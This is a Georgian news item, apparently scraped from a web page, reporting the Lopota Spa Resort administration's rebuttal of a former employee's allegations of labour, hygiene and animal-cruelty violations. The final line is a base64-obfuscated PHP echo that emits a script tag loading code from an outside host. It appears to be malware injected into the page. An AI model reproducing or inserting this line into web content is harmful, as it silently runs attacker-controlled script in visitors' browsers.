celsiusi
ავერსი საქკაბელი

გვსურს გამოვეხმაუროთ ლოპოტა სპა რეზორტის შესახებ სოციალურ მედიაში გავრცელებულ ინფორმაციას, რომელშიც მოყვანილმა დამახინჯებულმა ფაქტებმა სამწუხაროდ საზოგადოების ნაწილი შეცდომაში შეიყვანა, - ასე ეხმაურება ყოფილი თანამშრომლის მიერ გავრცელებულ ინფორმაციას ადმინისტრაცია. 

ცნობისთვის, გუშინ სოციალურ ქსელში  ლოპოტა სპა რეზორტის ყოფილმა თანამშრომელმა გამოაქვეყნა წერილი, სადაც აღწერს იქ არსებულ მძიმე ვითარებაზე, ადამიანის და ცხოველის უფლების დარღვევებზე, შრომის კოდექსით გათვალისწინებული წესების არ არსებობაზე, ჰიგიენის ნორმის დარღვევებზე და სხვა... 

"ლოპოტა დღემდე ემსახურება იმ იდეალებს, რომლითაც მისმა დამფუძნებელმა ის 2008 წელს შექმნა და მიუვალი ადგილი ქვეყნის ტურისტულ სახედ აქცია, სწორედ ადამიანებისა და ბუნების სიყვარულით.
 
წერილში მოყვანილია ბევრი კონტექსტიდან ამოვარდნილი ფაქტი და ცრუ ინფორმაცია, რაც შეურაცხყოფას აყენებს არა მხოლოდ ლოპოტას, როგორც კომპანიას, არამედ მის ერთგულ 400-ზე მეტ თანამშრომელს, რომელთა დიდი ნაწილიც ჩვენთან 5, 10 და 15 წელი მუშაობს.
 
გვერწმუნეთ, არა თუ ასახსნელად, არამედ წარმოსადგენადაც რთულია, რაოდენ დიდი მორალური ზიანი მიაყენა თითოეულ თანამშრომელს ერთი ადამიანის, არაერთგზის, წლების წინ მომხდარი და მაშინვე რეაგირებული ფაქტის ამ დამახინჯებულმა ინტერპრეტაციამ.
 
აქვე აღვნიშნავთ, ცხოველების მიმართ კონკრეტული თანამშრომლის მიერ სასტიკი და არაჰუმანური მოპყრობის ფაქტის შესახებ მენეჯმენტის ინფორმირებისთანავე, ყველა პირდაპირ თუ ირიბად ჩართული მხარე იქნა სამსახურიდან დაუყოვნებლივ გათავისუფლებული. გარდა ამისა, გამკაცრდა კონტროლი და გაძლიერდა ვიდეო მეთვალყურეობა. გავრცელებული ვიდეო მასალა 2022 წლის მოვლენებს ასახავს, რის შესახებაც ჩვენმა გუნდმა მყისიერად მოახდინა საზოგადოების ინფორმირება.
 
სრული გამჭვირვალობისთვის ლოპოტას გუნდი ვაცხადებთ მზაობას მოვიწვიოთ როგორც ადამიანის უფლებებზე, ასევე ცხოველთა უფლებებზე მომუშავე ორგანიზაციები და ნათლად დავანახოთ საზოგადოებას ჩვენი დამოკიდებულება როგორც თანამშრომელთა, ასევე ლოპოტაზე ბინადარ ცხოველთა მიმართ." - წერია ადმინისტრაციის მიერ გავრცელებულ განცხადებაში.  

 

 

358
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");